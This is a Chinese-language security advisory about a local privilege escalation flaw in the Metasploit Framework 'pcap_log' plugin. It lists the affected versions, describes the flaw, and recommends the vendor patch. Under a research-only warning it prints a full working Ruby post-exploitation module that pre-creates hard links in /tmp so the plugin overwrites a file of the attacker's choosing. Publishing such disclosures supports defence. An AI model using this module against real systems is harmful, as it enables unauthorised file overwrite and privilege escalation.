MetaSploit Framework 'pcap_log'插件本地权限提升漏洞
MetaSploit Framework 'pcap_log'插件本地权限提升漏洞
发布日期:2012-07-16
更新日期:2012-07-17
受影响系统:
Metasploit Framework Metasploit Framework 3.5.2
Metasploit Framework Metasploit Framework 4.1.0
Metasploit Framework Metasploit Framework 3.5.1
Metasploit Framework Metasploit Framework 3.5
Metasploit Framework Metasploit Framework 3.4
Metasploit Framework Metasploit Framework 3.3
Metasploit Framework Metasploit Framework 3.1
Metasploit Framework Metasploit Framework 3.0
Metasploit Framework Metasploit Framework 2.4
Metasploit Framework Metasploit Framework 2.3
Metasploit Framework Metasploit Framework 2.2
Metasploit Framework Metasploit Framework 2.1
Metasploit Framework Metasploit Framework 2.0
Metasploit Framework Metasploit Framework 1.0
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 54472
Metasploit是一款开源的安全漏洞检测工具,由于是免费的,因此常被安全工作人员用来检测系统的安全性。 Metasploit Framework (MSF)是2003年以开放源代码方式发布、可自由获取的开发框架,这个环境为渗透测试、shellcode 编写和漏洞研究提供了一个可靠的平台。
Metasploit Framework在实现上存在本地权限提升漏洞,本地攻击者可利用此漏洞覆盖Metasploit目录中的任意文件,成功利用后可允许攻击者以提升的权限执行任意代码。
<*来源:0a29406d9794e4f9b30b3c5d6702c708
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
0a29406d9794e4f9b30b3c5d6702c708 ()提供了如下测试方法:
# $Id$
##
##
# ## This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
require 'rex'
require 'msf/core/post/common'
require 'msf/core/post/file'
require 'msf/core/post/linux/system'
class Metasploit3 < Msf::Post
include Msf::Post::Common
include Msf::Post::File
include Msf::Post::Linux::System
def initialize(info={})
super( update_info( info,
'Name' => 'Metasploit plugin "pcap_log" arbirary file overwrite / privilege escalation',
'Description' => %q{ Post exploitation module to exploit 0A29-12-2, a vulnerability in metasploit pcap_log plugin.
Depending on the file you choose to overwrite, you will need to netcat/telnet etc. the data
that you wish to appear in the file.},
'License' => MSF_LICENSE,
'Author' => [ '0a29406d9794e4f9b30b3c5d6702c708'],
'Version' => '$Revision$',
'Platform' => [ 'linux' ],
'SessionTypes' => [ 'shell', 'meterpreter' ],
'References' =>
[
[ 'URL', 'http://0a29.blogspot.com/2012/07/0a29-12-2-metasploit-pcaplog-plugin.html' ],
[ 'URL', 'https://github.com/rapid7/metasploit-framework/commit/428a98c1d1d5341d32ffe0ed380d06a327ed2740' ]
],
'DisclosureDate'=> "July 16 2012"
))
register_options([
OptInt.new('NUMBER', [true, 'Number of seconds to prime /tmp/ with', nil]),
OptString.new('FILE', [true, 'File to overwrite with PCAP data', nil]),
], self.class)
end
def link(t)
file_part = "%s_%04d-%02d-%02d_%02d-%02d-%02d.pcap" % [
"msf3-session", t.year, t.month, t.mday, t.hour, t.min, t.sec
]
fname = ::File.join("/tmp", file_part)
retval = session.shell_command("/bin/ln #{datastore['FILE']} #{fname}")
end
# Run Method for when run command is issued
def run
for i in 0..(datastore['NUMBER'])
link(Time.now+i)
end
print_status("Set #{datastore['NUMBER']} links.")
end
def cleanup
print_status("Manual cleanup required: rm -f /tmp/msf3-session*")
end
end
建议:
--------------------------------------------------------------------------------
厂商补丁:
Metasploit Framework
--------------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.metasploit.org/
评论暂时关闭